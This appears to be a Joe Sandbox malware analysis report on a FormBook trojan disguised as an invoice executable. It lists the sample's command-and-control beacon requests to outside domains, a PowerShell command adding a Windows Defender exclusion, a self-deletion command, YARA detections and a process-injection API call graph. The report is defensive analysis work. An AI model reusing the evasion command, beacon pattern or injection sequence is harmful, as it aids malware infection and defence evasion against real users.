                                          Jul 1, 2024 15:12:33.239950895 CEST1.1.1.1192.168.2.60x1b10No error (0)www.light-in-the-heavens.comlight-in-the-heavens.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 1, 2024 15:12:33.239950895 CEST1.1.1.1192.168.2.60x1b10No error (0)light-in-the-heavens.com93.127.208.60A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:12:53.348520041 CEST1.1.1.1192.168.2.60x3cfeNo error (0)www.amycostellospeech.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 1, 2024 15:12:53.348520041 CEST1.1.1.1192.168.2.60x3cfeNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:12:53.348520041 CEST1.1.1.1192.168.2.60x3cfeNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:12:53.348520041 CEST1.1.1.1192.168.2.60x3cfeNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:12:53.348520041 CEST1.1.1.1192.168.2.60x3cfeNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:13:55.409405947 CEST1.1.1.1192.168.2.60x4acbNo error (0)www.whatsapp-p.vip34.96.226.230A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:14:15.751517057 CEST1.1.1.1192.168.2.60x7eadNo error (0)www.0909000000.comsy64n5r3.myacdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 1, 2024 15:14:15.751517057 CEST1.1.1.1192.168.2.60x7eadNo error (0)sy64n5r3.myacdn.comgt4ucrpq.myacdn.comCNAME (Canonical name)IN (0x0001)false
                                          Jul 1, 2024 15:14:15.751517057 CEST1.1.1.1192.168.2.60x7eadNo error (0)gt4ucrpq.myacdn.com43.252.160.86A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:14:15.751517057 CEST1.1.1.1192.168.2.60x7eadNo error (0)gt4ucrpq.myacdn.com43.252.160.85A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:14:15.751517057 CEST1.1.1.1192.168.2.60x7eadNo error (0)gt4ucrpq.myacdn.com43.252.160.87A (IP address)IN (0x0001)false
                                          Jul 1, 2024 15:14:36.084759951 CEST1.1.1.1192.168.2.60x4913Server failure (2)www.parsendustriyel.comnonenoneA (IP address)IN (0x0001)false

                                          HTTP Request Dependency Graph

                                          • www.htgithub.com
                                          • www.transpecosexpress.com
                                          • www.huskyacres.net
                                          • www.light-in-the-heavens.com
                                          • www.amycostellospeech.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.649728103.224.182.210804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 1, 2024 15:11:12.583030939 CEST178OUTGET /ps94/?F8LpzZ=Ou1M3UznMYP3/z75aLq7G1bnd1hdBtxibSn4CArHC3+lhopVrt7mzXvF4mg5pwrWYjFxCbVg2Q==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1
                                          Host: www.htgithub.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.64973144.227.76.166804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 1, 2024 15:11:32.898164988 CEST187OUTGET /ps94/?F8LpzZ=NZ9eraEhv94yON/2bUX4SSFhEhWB0QBw+0BDZem6mAjxIxJreavZH/9X5JlSDc5BrQ6sTwPTOA==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1
                                          Host: www.transpecosexpress.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.649735156.67.74.121804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 1, 2024 15:11:52.330739975 CEST180OUTGET /ps94/?F8LpzZ=eSVNrp7QRfgmdHm4kZgp0HkMaL1TXVSZsbEIx3MHUiuygKteU4HdDiczHYPUqFCs89gbploIxQ==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1
                                          Host: www.huskyacres.net
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.64973893.127.208.60804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 1, 2024 15:12:33.251065016 CEST190OUTGET /ps94/?F8LpzZ=4r6ViE8iaOvd1EXDO+38A5nQy2CJJN6ZNrbaIsLdrl8xpZaKAAcomjZYRR2tpFVDWyaQZR6wxQ==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1
                                          Host: www.light-in-the-heavens.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.649740198.185.159.144804004C:\Windows\explorer.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 1, 2024 15:12:53.354384899 CEST187OUTGET /ps94/?F8LpzZ=Z8xr6Td5qC+h9r+P8xpcNx+5AFGRik/pzejMl2EQ43koTqqLsxs6TtkvjcUWJXi0kPax//YTLQ==&XPa=ABZ4lrqh9bG4uhdP HTTP/1.1
                                          Host: www.amycostellospeech.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Jul 1, 2024 15:12:53.821005106 CEST1236INHTTP/1.1 400 Bad Request
                                          Cache-Control: no-cache, must-revalidate
                                          Content-Length: 2061
                                          Content-Type: text/html; charset=UTF-8
                                          Date: Mon, 01 Jul 2024 13:12:53 UTC
                                          Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                          Pragma: no-cache
                                          Server: Squarespace
                                          X-Contextid: dh943mLH/u5SonqeU
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d [TRUNCATED]
                                          Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 400; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 400; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em;
                                          Jul 1, 2024 15:12:53.821027040 CEST1124INData Raw: 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20
                                          Data Ascii: } footer span { margin: 0 11px; font-size: 1em; font-weight: 400; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 400; color: #191919; } @media (max-width: 600px) { body {


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:09:10:25
                                          Start date:01/07/2024
                                          Path:C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"
                                          Imagebase:0x690000
                                          File size:622'592 bytes
                                          MD5 hash:0559ACBAACFCF93CEFD8BCBFD498BFE4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2141241119.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:3
                                          Start time:09:10:26
                                          Start date:01/07/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"
                                          Imagebase:0x390000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:4
                                          Start time:09:10:26
                                          Start date:01/07/2024
                                          Path:C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"
                                          Imagebase:0x600000
                                          File size:622'592 bytes
                                          MD5 hash:0559ACBAACFCF93CEFD8BCBFD498BFE4
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2258014425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:5
                                          Start time:09:10:26
                                          Start date:01/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:09:10:27
                                          Start date:01/07/2024
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff609140000
                                          File size:5'141'208 bytes
                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000006.00000002.4585321350.0000000010FB7000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:7
                                          Start time:09:10:36
                                          Start date:01/07/2024
                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                          Imagebase:0xa20000
                                          File size:59'904 bytes
                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4571709994.0000000004530000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4571667584.0000000004500000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4570982856.00000000005D0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high
                                          Has exited:false

                                          General

                                          Target ID:8
                                          Start time:09:10:40
                                          Start date:01/07/2024
                                          Path:C:\Windows\SysWOW64\cmd.exe
                                          Wow64 process (32bit):true
                                          Commandline:/c del "C:\Users\user\Desktop\INVOICE - MV CNC BANGKOK - ST24PJ-278.exe"
                                          Imagebase:0x1c0000
                                          File size:236'544 bytes
                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          General

                                          Target ID:9
                                          Start time:09:10:40
                                          Start date:01/07/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff66e660000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:10.5%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:244
                                            Total number of Limit Nodes:11
                                            execution_graph 32083 e84668 32084 e8467a 32083->32084 32085 e84686 32084->32085 32089 e84778 32084->32089 32094 e84204 32085->32094 32087 e846a5 32090 e8479d 32089->32090 32098 e84888 32090->32098 32102 e84878 32090->32102 32095 e8420f 32094->32095 32110 e85c6c 32095->32110 32097 e87122 32097->32087 32099 e848af 32098->32099 32100 e8498c 32099->32100 32106 e844e4 32099->32106 32103 e848af 32102->32103 32104 e844e4 CreateActCtxA 32103->32104 32105 e8498c 32103->32105 32104->32105 32107 e85918 CreateActCtxA 32106->32107 32109 e859db 32107->32109 32109->32109 32111 e85c77 32110->32111 32114 e85c8c 32111->32114 32113 e871cd 32113->32097 32115 e85c97 32114->32115 32118 e85cbc 32115->32118 32117 e872a2 32117->32113 32119 e85cc7 32118->32119 32122 e85cec 32119->32122 32121 e873a5 32121->32117 32123 e85cf7 32122->32123 32125 e886ab 32123->32125 32129 e8ad58 32123->32129 32124 e886e9 32124->32121 32125->32124 32133 e8ce41 32125->32133 32138 e8ce50 32125->32138 32143 e8ad7f 32129->32143 32147 e8ad90 32129->32147 32130 e8ad6e 32130->32125 32134 e8ce71 32133->32134 32135 e8ce95 32134->32135 32170 e8cfef 32134->32170 32174 e8d000 32134->32174 32135->32124 32139 e8ce71 32138->32139 32140 e8ce95 32139->32140 32141 e8cfef 2 API calls 32139->32141 32142 e8d000 2 API calls 32139->32142 32140->32124 32141->32140 32142->32140 32144 e8ad90 32143->32144 32150 e8ae79 32144->32150 32145 e8ad9f 32145->32130 32149 e8ae79 2 API calls 32147->32149 32148 e8ad9f 32148->32130 32149->32148 32151 e8ae99 32150->32151 32152 e8aebc 32150->32152 32151->32152 32158 e8b120 32151->32158 32162 e8b111 32151->32162 32152->32145 32153 e8aeb4 32153->32152 32154 e8b0c0 GetModuleHandleW 32153->32154 32155 e8b0ed 32154->32155 32155->32145 32159 e8b134 32158->32159 32161 e8b159 32159->32161 32166 e8a248 32159->32166 32161->32153 32163 e8b134 32162->32163 32164 e8b159 32163->32164 32165 e8a248 LoadLibraryExW 32163->32165 32164->32153 32165->32164 32167 e8b300 LoadLibraryExW 32166->32167 32169 e8b379 32167->32169 32169->32161 32171 e8d00d 32170->32171 32173 e8d047 32171->32173 32178 e8b860 32171->32178 32173->32135 32175 e8d00d 32174->32175 32176 e8d047 32175->32176 32177 e8b860 2 API calls 32175->32177 32176->32135 32177->32176 32179 e8b86b 32178->32179 32181 e8dd58 32179->32181 32182 e8d164 32179->32182 32181->32181 32183 e8d16f 32182->32183 32184 e85cec 2 API calls 32183->32184 32185 e8ddc7 32184->32185 32185->32181 32388 e8d518 32389 e8d55e 32388->32389 32393 e8d6f8 32389->32393 32396 e8d6ea 32389->32396 32390 e8d64b 32395 e8d726 32393->32395 32399 e8b870 32393->32399 32395->32390 32397 e8b870 DuplicateHandle 32396->32397 32398 e8d726 32397->32398 32398->32390 32400 e8d760 DuplicateHandle 32399->32400 32401 e8d7f6 32400->32401 32401->32395 32186 4a52872 32191 4a53666 32186->32191 32209 4a53608 32186->32209 32226 4a535f8 32186->32226 32187 4a5273c 32192 4a535f4 32191->32192 32193 4a53669 32191->32193 32243 4a53ea1 32192->32243 32248 4a541bb 32192->32248 32252 4a53b19 32192->32252 32258 4a541ff 32192->32258 32263 4a53d7c 32192->32263 32269 4a53c5d 32192->32269 32273 4a53e12 32192->32273 32278 4a53a90 32192->32278 32284 4a53eb1 32192->32284 32289 4a53f51 32192->32289 32294 4a53f71 32192->32294 32299 4a53cb5 32192->32299 32304 4a5402d 32192->32304 32309 4a53f03 32192->32309 32193->32187 32194 4a53646 32194->32187 32210 4a53622 32209->32210 32212 4a53ea1 2 API calls 32210->32212 32213 4a53f03 2 API calls 32210->32213 32214 4a5402d 2 API calls 32210->32214 32215 4a53cb5 2 API calls 32210->32215 32216 4a53f71 2 API calls 32210->32216 32217 4a53f51 2 API calls 32210->32217 32218 4a53eb1 2 API calls 32210->32218 32219 4a53a90 2 API calls 32210->32219 32220 4a53e12 2 API calls 32210->32220 32221 4a53c5d 2 API calls 32210->32221 32222 4a53d7c 2 API calls 32210->32222 32223 4a541ff 2 API calls 32210->32223 32224 4a53b19 2 API calls 32210->32224 32225 4a541bb 2 API calls 32210->32225 32211 4a53646 32211->32187 32212->32211 32213->32211 32214->32211 32215->32211 32216->32211 32217->32211 32218->32211 32219->32211 32220->32211 32221->32211 32222->32211 32223->32211 32224->32211 32225->32211 32227 4a53608 32226->32227 32229 4a53ea1 2 API calls 32227->32229 32230 4a53f03 2 API calls 32227->32230 32231 4a5402d 2 API calls 32227->32231 32232 4a53cb5 2 API calls 32227->32232 32233 4a53f71 2 API calls 32227->32233 32234 4a53f51 2 API calls 32227->32234 32235 4a53eb1 2 API calls 32227->32235 32236 4a53a90 2 API calls 32227->32236 32237 4a53e12 2 API calls 32227->32237 32238 4a53c5d 2 API calls 32227->32238 32239 4a53d7c 2 API calls 32227->32239 32240 4a541ff 2 API calls 32227->32240 32241 4a53b19 2 API calls 32227->32241 32242 4a541bb 2 API calls 32227->32242 32228 4a53646 32228->32187 32229->32228 32230->32228 32231->32228 32232->32228 32233->32228 32234->32228 32235->32228 32236->32228 32237->32228 32238->32228 32239->32228 32240->32228 32241->32228 32242->32228 32244 4a54359 32243->32244 32313 4a51a10 32244->32313 32317 4a51a18 32244->32317 32245 4a5436e 32321 4a52090 32248->32321 32325 4a52098 32248->32325 32249 4a541df 32253 4a53a81 32252->32253 32254 4a53a28 32253->32254 32329 4a52314 32253->32329 32333 4a52320 32253->32333 32254->32194 32259 4a54461 32258->32259 32337 4a546e8 32259->32337 32342 4a546d8 32259->32342 32260 4a54443 32260->32194 32265 4a53d96 32263->32265 32264 4a542a0 32264->32194 32265->32264 32267 4a51a10 ResumeThread 32265->32267 32268 4a51a18 ResumeThread 32265->32268 32266 4a5436e 32267->32266 32268->32266 32355 4a54730 32269->32355 32360 4a54721 32269->32360 32270 4a53c7d 32274 4a53e32 32273->32274 32276 4a51a10 ResumeThread 32274->32276 32277 4a51a18 ResumeThread 32274->32277 32275 4a5436e 32275->32275 32276->32275 32277->32275 32280 4a53a96 32278->32280 32279 4a53a48 32279->32194 32280->32279 32282 4a52314 CreateProcessA 32280->32282 32283 4a52320 CreateProcessA 32280->32283 32281 4a53b69 32281->32194 32282->32281 32283->32281 32285 4a53ec9 32284->32285 32287 4a51a10 ResumeThread 32285->32287 32288 4a51a18 ResumeThread 32285->32288 32286 4a5436e 32287->32286 32288->32286 32290 4a53cdb 32289->32290 32291 4a53b9b 32289->32291 32292 4a52090 WriteProcessMemory 32290->32292 32293 4a52098 WriteProcessMemory 32290->32293 32291->32194 32292->32291 32293->32291 32295 4a53f94 32294->32295 32297 4a52090 WriteProcessMemory 32295->32297 32298 4a52098 WriteProcessMemory 32295->32298 32296 4a53b9b 32296->32194 32297->32296 32298->32296 32300 4a53cbb 32299->32300 32302 4a52090 WriteProcessMemory 32300->32302 32303 4a52098 WriteProcessMemory 32300->32303 32301 4a53b9b 32301->32194 32302->32301 32303->32301 32305 4a54308 32304->32305 32307 4a51f00 Wow64SetThreadContext 32305->32307 32308 4a51ef9 Wow64SetThreadContext 32305->32308 32306 4a54323 32307->32306 32308->32306 32373 4a52180 32309->32373 32377 4a52188 32309->32377 32310 4a53f26 32314 4a51a18 ResumeThread 32313->32314 32316 4a51a89 32314->32316 32316->32245 32318 4a51a58 ResumeThread 32317->32318 32320 4a51a89 32318->32320 32320->32245 32322 4a52098 WriteProcessMemory 32321->32322 32324 4a52137 32322->32324 32324->32249 32326 4a520e0 WriteProcessMemory 32325->32326 32328 4a52137 32326->32328 32328->32249 32330 4a523a9 CreateProcessA 32329->32330 32332 4a5256b 32330->32332 32334 4a523a9 CreateProcessA 32333->32334 32336 4a5256b 32334->32336 32338 4a546fd 32337->32338 32347 4a51f00 32338->32347 32351 4a51ef9 32338->32351 32339 4a54713 32339->32260 32343 4a546e8 32342->32343 32345 4a51f00 Wow64SetThreadContext 32343->32345 32346 4a51ef9 Wow64SetThreadContext 32343->32346 32344 4a54713 32344->32260 32345->32344 32346->32344 32348 4a51f45 Wow64SetThreadContext 32347->32348 32350 4a51f8d 32348->32350 32350->32339 32352 4a51f00 Wow64SetThreadContext 32351->32352 32354 4a51f8d 32352->32354 32354->32339 32356 4a54745 32355->32356 32365 4a51fd0 32356->32365 32369 4a51fd8 32356->32369 32357 4a54764 32357->32270 32361 4a54730 32360->32361 32363 4a51fd0 VirtualAllocEx 32361->32363 32364 4a51fd8 VirtualAllocEx 32361->32364 32362 4a54764 32362->32270 32363->32362 32364->32362 32366 4a51fd5 VirtualAllocEx 32365->32366 32368 4a52055 32366->32368 32368->32357 32370 4a52018 VirtualAllocEx 32369->32370 32372 4a52055 32370->32372 32372->32357 32374 4a52188 ReadProcessMemory 32373->32374 32376 4a52217 32374->32376 32376->32310 32378 4a521d3 ReadProcessMemory 32377->32378 32380 4a52217 32378->32380 32380->32310 32381 4a54848 32382 4a549d3 32381->32382 32384 4a5486e 32381->32384 32384->32382 32385 4a508d0 32384->32385 32386 4a54ac8 PostMessageW 32385->32386 32387 4a54b34 32386->32387 32387->32384

                                            Executed Functions

                                            Function 04A559C0 Relevance: .6, Instructions: 626COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2142465173.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4a50000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e9109aa753ded96ffad1f5c5ab67e52d85836a39f3bb8ca78d26f7718006866
                                            • Instruction ID: 7db073967f37350f4cb1c3fdc352022026241871b6244c3b9fac3d12090f4525
                                            • Opcode Fuzzy Hash: 1e9109aa753ded96ffad1f5c5ab67e52d85836a39f3bb8ca78d26f7718006866
                                            • Instruction Fuzzy Hash: 7632BE71B012049FEB19EB65C654BAEBBF6AF89300F144469E909EB3A5DF34EC01CB51
                                            Function 0AB2C3E0 Relevance: .1, Instructions: 63COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2147356021.000000000AB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ab20000_INVOICE - MV CNC BANGKOK - ST24PJ-278.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 04d184b4ef8607cbd0f6286a793382b3438a1a65dc481e226e725af92e3f721c
                                            • Instruction ID: fd958f9425e9439ed4862cebd47a5ee278e3b614be2155db2fe946e193409edd
                                            • Opcode Fuzzy Hash: 04d184b4ef8607cbd0f6286a793382b3438a1a65dc481e226e725af92e3f721c
                                            • Instruction Fuzzy Hash: D421E6B0D046589BEB18CFA6C9453EEBFB6AF89300F04C16AD419A62A4DB7409458F50
                                            Function 0AB2C3F0 Relevance: .1, Instructions: 60COMMON
                                            Download Yara Rule
                                            Memory Dump Source
